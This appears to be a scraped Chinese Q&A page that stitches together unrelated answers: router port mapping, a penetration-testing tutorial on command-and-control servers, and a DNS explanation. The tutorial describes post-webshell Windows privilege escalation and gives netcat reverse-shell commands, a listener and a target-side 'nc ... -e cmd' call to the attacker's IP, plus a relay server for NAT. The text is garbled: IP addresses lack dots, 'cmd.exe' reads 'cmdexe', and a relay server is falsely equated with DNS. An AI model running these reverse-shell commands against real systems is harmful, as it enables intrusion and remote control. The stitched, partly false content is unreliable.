个人建议:在域名下做二级域名,将服务器A和服务器B的默认网页访问端口80映射到你路由器的不同端口,分别指向服务器A和服务器B,然后把两个二级域名分别告知两个客户,让他们通过访问不同的二级域名来实现你的目的。
C&C 服务器的全称是 Command and Control Server,翻译过来就是命令和控制服务器
通常在做渗透测试的时候,在拿到一个 webshell 的时候,需要对服务器进行提权 *** 作,如果是一台 windows 的服务器,提权的时候通常是利用本地提权漏洞的 exp 进行溢出提权,有些 exp 可以直接在后面加参数,溢出成功之后执行参数中的命令。
而有的 exp 溢出成功之后是返回一个 system 权限的 cmd,这时就需要将低权限的 cmd shell 反d回本地,这里用 nc 在本地执行:nc -vv -lp 3333
上述命令的意思是在本地监听一个 3333 端口等待连接,假设电脑 IP 是公网的,并且 IP 为 114114114114,然后在目标服务器就可以执行:nc 114114114114 3333 -e cmdexe
上面的命令就可以把远程服务器的服务器权限的 cmd shell 返回到本地,这时你就可以通过 nc 建立的这个 shell 进行通信,发送你要执行的命令,在远程服务器接收到命令之后执行并将结果返回,这时本机电脑就是一个简易的 C&C 服务器。
扩展资料:
C&C 服务器使目标机器可以接收来自服务器的命令,从而达到服务器控制目标机器的目的。该方法常用于病毒木马控制被感染的机器。
通常只有这样内网的服务器才可以访问进行连接,所以可以使用一台中转服务器,这台中转服务器有一个公网 IP 地址是:111111111111,这样不管是目标服务器还是我们本机都可以访问这台中转服务器。
这里中转服务器的作用就是本地内网的主机监听的端口映射到公网 IP 的某个端口,这样目标机访问中转服务器监听的端口就相当于访问了我们本地监听的端口。
你说的是电脑中的中转服务器吧。中转服务器是域名系统,其作用就是将域名解析为IP地址。中转服务器利用树形目录结构,将主机名的管理分配给不同的层级,这样可以实现更加快速的完成主机名的查找, 修改主机名解析时也更加方便。
中转服务器原理:1、客户机提出域名解析请求,并将该请求发送给本地的域名服务器。2、当本地的域名服务器收到请求后,就先查询本地的缓存,如果有该纪录项,则本地的域名服务器就直接把查询的结果返回。3、如果本地的缓存中没有该纪录,则本地域名服务器就直接把请求发给根域名服务器,然后根域名服务器再返回给本地域名服务器一个所查询域(根的子域 )的主域名服务器的地址。4、本地服务器再向上一步返回的域名服务器发送请求,然后接受请求的服务器查询自己的缓存,如果没有该纪录,则返回相关的下级的域名服务器的地址。5、重复第四步,直到找到正确的纪录。6、本地域名服务器把返回的结果保存到缓存,以备下一次使用,同时还将结果返回给客户机。
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)